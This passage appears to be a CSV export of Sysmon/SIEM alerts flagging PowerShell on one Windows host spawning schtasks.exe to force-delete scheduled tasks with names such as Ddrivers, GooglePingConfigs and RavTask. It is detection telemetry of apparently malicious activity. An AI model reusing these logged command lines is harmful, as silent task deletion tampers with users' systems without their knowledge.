5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:30.338",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.988 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010a8342700} +ProcessId: 1440 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Ddrivers /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Ddrivers /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.990322800Z"",""eventRecordID"":""3078"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.988\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010a8342700}\r\nProcessId: 1440\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Ddrivers /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.988"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010a8342700}"",""processId"":""1440"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Ddrivers /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:30.321",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.965 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010ed322700} +ProcessId: 2936 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Bluetooths /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Bluetooths /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.969781300Z"",""eventRecordID"":""3077"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.965\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010ed322700}\r\nProcessId: 2936\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Bluetooths /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.965"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010ed322700}"",""processId"":""2936"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Bluetooths /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.744",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.944 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-00102e302700} +ProcessId: 1996 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WwANsvc /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WwANsvc /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.946841100Z"",""eventRecordID"":""3076"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.944\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-00102e302700}\r\nProcessId: 1996\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WwANsvc /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.944"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-00102e302700}"",""processId"":""1996"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WwANsvc /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.734",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.920 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010242d2700} +ProcessId: 5604 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN MiscfostNsi /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN MiscfostNsi /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.923368800Z"",""eventRecordID"":""3075"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.920\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010242d2700}\r\nProcessId: 5604\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN MiscfostNsi /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.920"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010242d2700}"",""processId"":""5604"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN MiscfostNsi /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.716",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.866 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010fb272700} +ProcessId: 7520 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN GooglePingConfigs /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN GooglePingConfigs /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.868967400Z"",""eventRecordID"":""3073"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.866\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010fb272700}\r\nProcessId: 7520\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN GooglePingConfigs /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.866"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010fb272700}"",""processId"":""7520"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN GooglePingConfigs /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.716",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.896 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010552a2700} +ProcessId: 5596 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN HomeGroupProvider /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HomeGroupProvider /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.899829800Z"",""eventRecordID"":""3074"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.896\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010552a2700}\r\nProcessId: 5596\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HomeGroupProvider /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.896"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010552a2700}"",""processId"":""5596"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN HomeGroupProvider /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.687",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.844 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010a5252700} +ProcessId: 7588 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN RavTask /F 